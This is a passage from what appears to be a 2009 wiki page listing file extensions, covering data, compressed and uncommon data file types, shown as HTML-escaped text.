.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
